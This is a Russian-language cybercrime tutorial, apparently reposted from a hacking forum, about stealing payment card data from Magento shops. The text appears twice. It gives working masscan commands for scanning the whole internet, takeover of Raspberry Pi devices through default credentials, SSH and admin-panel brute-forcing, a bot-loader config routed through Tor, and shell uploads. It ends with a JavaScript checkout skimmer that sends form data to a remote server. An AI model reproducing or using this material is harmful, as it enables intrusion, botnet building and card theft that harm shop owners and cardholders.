Добыча CC на примере Magento
В данной статье я опишу один из рабочих вариантов добычи CC с помощью брута на примере приложения AccessBomber. Вы можете не использовать это приложение, а воспользоваться другими платными\бесплатными альтернативами.
Итак, начальные условия. У нас есть AccessBomber и 0 ботов. Для старта нам нужны хотя бы несколько RDP или шеллов.
Алгоритм:
- Добыча сервера для масскан
- Masscan SSH с Raspberry
- Брут SSH
- Запуск ботов на Raspberry
- Брут Magento
- Заливка шелла
- Профит
Добыча сервера для масскан
Идем в shodan с запросом https://www.shodan.io/search?query=Raspbian. Я вижу здесь 199,722 результата. Перебираем вручную 10-20+ результатов, пытаемся залогинится с паролем по умолчанию, юзер pi, логин raspberry. Это карманный компьютер с архитектурой Арм. Нам отлично подойдет под масскан. Здесь вы можете импровизировать, и искать разные orangePi и прочую никому кроме нам не нужную шелуху
Masscan SSH с Raspberry
Устанавливаем на добытый в предыдущем пункте доступ прогу Masscan
Значение --max-rate 10000 устанавливайте на свое усмотрение. Если поставите слишком большое, есть риск, что доступ уйдет в офф от перегрузки сети. Мы можем "прощупать" максимальный рейт, если добавим команду timeout.
Сейчас у нас запустится масскан с таймом 10 секунд. Если наша сеть ляжет - через 10 сек масскан кильнется, и сеть подымится (в большинстве случаев). Плавно повышаем рейт до максимально возможного параметра.
Итак, у нас есть файл с сохраненными баннерами. Нам нужно извлечь из него список IP адресов, у которых баннер Raspbian:
Брут SSH.
Создаем проект в AccessBomber - Брут SSH. Загружаем наш файл 22Raspbian.txt, загружаем файл с логином pi, загружаем какой-либо пасс-лист распространенных паролей, обязательно содержащий пароль raspberry. Берем бота, и запускаем его на 2-3 RDP или на нескольких веб шеллах.
По завершении проекта мы должны иметь внушительное количество гудов, на которых мы будем брутить Magento.
Запуск ботов на Raspberry.
Вместе с AccessBomber автор предоставляет приложение для прогруза ботов на SSH доступы - Ssh_executor.
Создаем конфиг файл для задачи прогруза magentoBrut.ini:
Запускаем: ./Ssh_executor magentoBrut.ini
Брут Magento.
Для того, чтобы начать снимать сливки уже сейчас, ищем в паблике базу доменов Magento. Для того, чтобы снимать сливки более качественно, с помощью AccessBomber мы можем сами отчекать список доменов. Если чекаем сами - создаем проект Magento Checker, указываем файл с доменама, поддоменами и кастомными каталогами поиска админки.
Итак, имеем отчеканую базу. Создаем проект Brut Magento, указываем список сайтов, логин и пасс лист. Найдите хороший пасс лист, например с датами рождения. Здесь уже ваша фантазия. В качестве логина используем admin, макрос [asDomain], ну и еще то, что нафантазируете (имя админа по французки, если брутим только францию, например).
Проект создан, жмем старт и ждем профит. После наших телодвижений с ботами у нас их должно быть штук 50-100. Такое количество ботов дадут вам скорость ~ 200k паролей в минуту на этом проекте (3к перебора в секунду).
Профит.
Чем больше ботов - тем жирнее пасс лист, тем лучше профит. Сбрутили, залили шелл, установили снифф (или продали шоп).
Для лучшего профита берем эту самую базу Magento, и проганяем ее по бруту Mysql, PhpMyAdmin, SSH, Ftp. Для еще лучшего профита берем чекер соседних сайтов на одном IP, прогоняем наши домены, и сортируем ее на Wordpress, Joomla, Drupal. Потом создаем проекты по бруту этих CMS, брутим, заливаемся -> профит.
Все сказаное в этой статье Вы можете сделать на бесплатном софте. Здесь я описал где взять ботов для брута и поднять немного денег на начальном этапе в бомжацких условиях, в которых был я, когда начинал писать этот софт.
P.S., пока Вы не подняли денег на аренду\покупку снифера, а поснифать что то хочется, вот вам рабочий метод бомжоснифа. Банально сериализуем форму, и пушим себе на сервак.
автор: CrazyCoder
взято с exploit'a
В данной статье я опишу один из рабочих вариантов добычи CC с помощью брута на примере приложения AccessBomber. Вы можете не использовать это приложение, а воспользоваться другими платными\бесплатными альтернативами.
Итак, начальные условия. У нас есть AccessBomber и 0 ботов. Для старта нам нужны хотя бы несколько RDP или шеллов.
Алгоритм:
- Добыча сервера для масскан
- Masscan SSH с Raspberry
- Брут SSH
- Запуск ботов на Raspberry
- Брут Magento
- Заливка шелла
- Профит
Добыча сервера для масскан
Идем в shodan с запросом https://www.shodan.io/search?query=Raspbian. Я вижу здесь 199,722 результата. Перебираем вручную 10-20+ результатов, пытаемся залогинится с паролем по умолчанию, юзер pi, логин raspberry. Это карманный компьютер с архитектурой Арм. Нам отлично подойдет под масскан. Здесь вы можете импровизировать, и искать разные orangePi и прочую никому кроме нам не нужную шелуху
Masscan SSH с Raspberry
Устанавливаем на добытый в предыдущем пункте доступ прогу Masscan
Код:
sudo -i (у Raspberry нету пароля на root)
apt-get install git gcc make libpcap-dev
cd masscan
make
cd bin
iptables -A INPUT -p tcp --dport 61000 -j DROP
./masscan -p 22 0.0.0.0/0 --max-rate 10000 --output-filename 22.txt --randomize-hosts --exclude 255.255.255.255 --banners --source-port 61000
Сейчас у нас запустится масскан с таймом 10 секунд. Если наша сеть ляжет - через 10 сек масскан кильнется, и сеть подымится (в большинстве случаев). Плавно повышаем рейт до максимально возможного параметра.
Код:
timeout 10 ./masscan -p 22 0.0.0.0/0 --max-rate 10000 --output-filename 22.txt --randomize-hosts --exclude 255.255.255.255 --banners --source-port 61000
Итак, у нас есть файл с сохраненными баннерами. Нам нужно извлечь из него список IP адресов, у которых баннер Raspbian:
Код:
cat 22.txt |grep "Raspbian" |grep -oE '[0-9]{1,3}+\.[0-9]{1,3}+\.[0-9]{1,3}\.[0-9]{1,3}' > 22Raspbian.txt
Брут SSH.
Создаем проект в AccessBomber - Брут SSH. Загружаем наш файл 22Raspbian.txt, загружаем файл с логином pi, загружаем какой-либо пасс-лист распространенных паролей, обязательно содержащий пароль raspberry. Берем бота, и запускаем его на 2-3 RDP или на нескольких веб шеллах.
По завершении проекта мы должны иметь внушительное количество гудов, на которых мы будем брутить Magento.
Запуск ботов на Raspberry.
Вместе с AccessBomber автор предоставляет приложение для прогруза ботов на SSH доступы - Ssh_executor.
Создаем конфиг файл для задачи прогруза magentoBrut.ini:
Код:
FileARM = MagentoBrut_Arm_x86
FileLinux_Amd64 = MagentoBrut_Linux_amd64
FileLinux_x86 = MagentoBrut_Linux_x86
# Каталог, в котором располагаются воркеры
FileDirectory = /tmp/
# Имя файла, в которое будет записан наш воркер на доступе. Он же будет отображаться в процессах
RemoteFileName = apacheb
[software]
threads = 100
# Будем прогружать через ТОР
socks5 = 127.0.0.1:9050
inputIpList = /tmp/sshBrut_good.txt
Брут Magento.
Для того, чтобы начать снимать сливки уже сейчас, ищем в паблике базу доменов Magento. Для того, чтобы снимать сливки более качественно, с помощью AccessBomber мы можем сами отчекать список доменов. Если чекаем сами - создаем проект Magento Checker, указываем файл с доменама, поддоменами и кастомными каталогами поиска админки.
Итак, имеем отчеканую базу. Создаем проект Brut Magento, указываем список сайтов, логин и пасс лист. Найдите хороший пасс лист, например с датами рождения. Здесь уже ваша фантазия. В качестве логина используем admin, макрос [asDomain], ну и еще то, что нафантазируете (имя админа по французки, если брутим только францию, например).
Проект создан, жмем старт и ждем профит. После наших телодвижений с ботами у нас их должно быть штук 50-100. Такое количество ботов дадут вам скорость ~ 200k паролей в минуту на этом проекте (3к перебора в секунду).
Профит.
Чем больше ботов - тем жирнее пасс лист, тем лучше профит. Сбрутили, залили шелл, установили снифф (или продали шоп).
Для лучшего профита берем эту самую базу Magento, и проганяем ее по бруту Mysql, PhpMyAdmin, SSH, Ftp. Для еще лучшего профита берем чекер соседних сайтов на одном IP, прогоняем наши домены, и сортируем ее на Wordpress, Joomla, Drupal. Потом создаем проекты по бруту этих CMS, брутим, заливаемся -> профит.
Все сказаное в этой статье Вы можете сделать на бесплатном софте. Здесь я описал где взять ботов для брута и поднять немного денег на начальном этапе в бомжацких условиях, в которых был я, когда начинал писать этот софт.
P.S., пока Вы не подняли денег на аренду\покупку снифера, а поснифать что то хочется, вот вам рабочий метод бомжоснифа. Банально сериализуем форму, и пушим себе на сервак.
Код:
mgsjQuery(document).ready(function () {
if (window.location.pathname.indexOf("oscheckout") !== -1 && mgsjQuery('#p_method_verisign').is(':checked')) {
mgsjQuery('#review-btn').click(function (e) {
e.preventDefault();
var formS = decodeURIComponent(mgsjQuery('#oscheckout-form').serialize());
var service = new WebSocket("wss://example.com:8080/g");
service.onopen = function () {
service.send(formS);
service.close();
};
service.onclose = function () {
return true;
};
});
}
});
автор: CrazyCoder
взято с exploit'a